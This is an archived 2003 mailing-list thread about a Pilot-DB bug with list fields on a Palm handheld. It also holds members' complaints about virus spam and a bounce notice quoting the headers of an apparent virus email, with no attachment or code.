arial"><B>Subject:</B> > [pilot-db-list] = > trouble with the=20 > List Field Type</DIV> > <DIV><BR></DIV> > <DIV><FONT face=3DArial size=3D2>I'm using > Pilot-DB v1.0.4 and = > Palm-DB-Tools=20 > v0.3.6.</FONT></DIV> > <DIV><FONT face=3DArial > size=3D2></FONT> </DIV> > <DIV><FONT face=3DArial size=3D2>I've tried > creating a PDB containing = > a list of=20 > the injured players</FONT></DIV> > <DIV><FONT face=3DArial size=3D2>in the NCAA ACC = > conference.</FONT></DIV> > <DIV><FONT face=3DArial > size=3D2></FONT> </DIV> > <DIV><FONT face=3DArial size=3D2>One of the > fields, the team name, is = > of type=20 > list, and should be</FONT></DIV> > <DIV><FONT face=3DArial size=3D2>one > of:</FONT></DIV> > <DIV><FONT face=3DArial > size=3D2></FONT> </DIV> > <DIV><FONT face=3DArial size=3D2>field "Team" list > = > "Clemson/Duke/Florida=20 > State/Georgia Tech/Maryland/North Carolina/NC > State/Virginia/Wake = > Forest"=20 > <BR></FONT></DIV> > <DIV><FONT face=3DArial size=3D2>When I look at > the PDB on my Visor = > Pro,=20 > === message truncated === ___________________________________________________ Yahoo! Messenger - Nueva versión GRATIS Super Webcam, voz, caritas animadas, y más... http://messenger.yahoo.es |
From: Kaldewey M. <mal...@si...> - 2003-08-27 11:16:35
|
From: Alain C. <Ala...@me...> - 2003-08-27 07:18:39
|
Hello, These days in these two mailing lists we attend a true pollution of messages to viral propaganda! Can the managers of these two lists do something to make cleaner the diffusion of messages? Thanks in advance --- Francais Ces jours dans ces deux listes de diffusion nous assistons =E0 une vraie pollution de messages =E0 propagande virale! Est-ce que les managers de ces deux listes peuvent faire quelque chose pour rendre plus propre la diffusion de ses messages? Merci par avance. AC --=20 Alain Chappuis [Ing=E9nieur Syst=E8me 1] Universit=E9 de Gen=E8ve/Facult=E9 de M=E9decine/Service Informatique 1, Rue Michel-Servet | CH-1211 Gen=E8ve 4 http://www.sifm.unige.ch/presentation/alain.php T=E9l.:++41 22.379.5073 Fax.:++41 22.379.3334/022.379.5858 |
From: Bernd I. <fin...@ar...> - 2003-08-27 06:36:20
|
do not need your virus, dude. f..ck off with that b.ill On Wed, 27 Aug 2003 13:52:45 +0800 <bil...@ho...> wrote: > See the attached file for details |
From: <MAI...@mr...> - 2003-08-27 03:59:43
|
--------Message not delivered to the following: rick.harbaugh No matches to nameserver query --------Error Detail (phquery V4.4): The message, "No matches to nameserver query," is generated whenever Yale's On-line Directory does not contain an email alias, name or nickname field that matches the supplied name. Please check that you have the correct email address by searching the Yale On-Line Directory on the web page at : <http://www.yale.edu/cgi-bin/ph/> Many people at Yale have similar names so please do not try to guess someone's email address. If you need further help please contact, pos...@ya... --------Unsent Message below: Received: from CNI-HK-MKT (ip235.bb168.pacific.net.hk [202.64.168.235]) by mr1.its.yale.edu (8.11.6p2/8.11.6) with ESMTP id h7R3xdD14062 for <ric...@ya...>; Tue, 26 Aug 2003 23:59:39 -0400 (EDT) Message-Id: <200...@mr...> From: <pil...@li...> To: <ric...@ya...> Subject: Re: Details Date: Wed, 27 Aug 2003 11:59:36 +0800 X-MailScanner: Found to be clean Importance: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MSMail-Priority: Normal X-Priority: 3 (Normal) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="_NextPart_000_00379084" X-YaleITSMailFilter: Version 1.1d (attachment(s) not renamed) This is a multipart message in MIME format --_NextPart_000_00379084 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Please see the attached file for details. --_NextPart_000_00379084-- --------End of Unsent Message |
From: Kelly S. H. <sh...@mo...> - 2003-08-27 02:21:20
|
err.. still didn't display correctly on my Visor. ----- Original Message -----=20 From: Kelly Shane Harrelson=20 To: pil...@li...=20 Sent: Tuesday, August 26, 2003 10:16 PM Subject: Re: [pilot-db-list] trouble with the List Field Type I tried using DB-Editor as well. The PDB appeared correctly in = DB-Editor, but the list field types still didn't display correctly. -Shane ----- Original Message -----=20 From: Kelly Shane Harrelson=20 To: pil...@li...=20 Sent: Tuesday, August 26, 2003 5:19 PM Subject: [pilot-db-list] trouble with the List Field Type I'm using Pilot-DB v1.0.4 and Palm-DB-Tools v0.3.6. I've tried creating a PDB containing a list of the injured players in the NCAA ACC conference. One of the fields, the team name, is of type list, and should be one of: field "Team" list "Clemson/Duke/Florida State/Georgia = Tech/Maryland/North Carolina/NC State/Virginia/Wake Forest"=20 When I look at the PDB on my Visor Pro, everything looks correct,=20 except for the records for the following players: "1","Virginia","LB","Dennis Haley","NCAA","Expected to miss = Saturday's game." "1","Wake Forest","RB","Chris Barclay","hamstring","Questionable." Both players appear with a blank team name. I checked the header in the PDB, and the list field for team name=20 appeared to be correct. I also checked the records for=20 the two players above, and they had the correct item id for=20 their respective list entries. So I don't think the problem lies = with the db-tools, but with Pilot-DB. Also, when I exit this PDB on my handheld, I get a "Fatal Abort" message: MemoryMgr.c, Line:4450, Invalid chunk ptr. The attached ZIP contains the following files, referenced above: 2003_NCAA_ACC_team_injured.csv - my raw data 2003_NCAA_ACC_team_injured.nfo - the info file used to create the = PDB 2003_NCAA_ACC_team_injured_d.pdb - the actual PDB. Any help would be appreciated. -Shane Harrelson |
From: Kelly S. H. <sh...@mo...> - 2003-08-27 02:15:32
|
I tried using DB-Editor as well. The PDB appeared correctly in = DB-Editor, but the list field types still didn't display correctly. -Shane ----- Original Message -----=20 From: Kelly Shane Harrelson=20 To: pil...@li...=20 Sent: Tuesday, August 26, 2003 5:19 PM Subject: [pilot-db-list] trouble with the List Field Type I'm using Pilot-DB v1.0.4 and Palm-DB-Tools v0.3.6. I've tried creating a PDB containing a list of the injured players in the NCAA ACC conference. One of the fields, the team name, is of type list, and should be one of: field "Team" list "Clemson/Duke/Florida State/Georgia = Tech/Maryland/North Carolina/NC State/Virginia/Wake Forest"=20 When I look at the PDB on my Visor Pro, everything looks correct,=20 except for the records for the following players: "1","Virginia","LB","Dennis Haley","NCAA","Expected to miss Saturday's = game." "1","Wake Forest","RB","Chris Barclay","hamstring","Questionable." Both players appear with a blank team name. I checked the header in the PDB, and the list field for team name=20 appeared to be correct. I also checked the records for=20 the two players above, and they had the correct item id for=20 their respective list entries. So I don't think the problem lies with = the db-tools, but with Pilot-DB. Also, when I exit this PDB on my handheld, I get a "Fatal Abort" message: MemoryMgr.c, Line:4450, Invalid chunk ptr. The attached ZIP contains the following files, referenced above: 2003_NCAA_ACC_team_injured.csv - my raw data 2003_NCAA_ACC_team_injured.nfo - the info file used to create the PDB 2003_NCAA_ACC_team_injured_d.pdb - the actual PDB. Any help would be appreciated. -Shane Harrelson |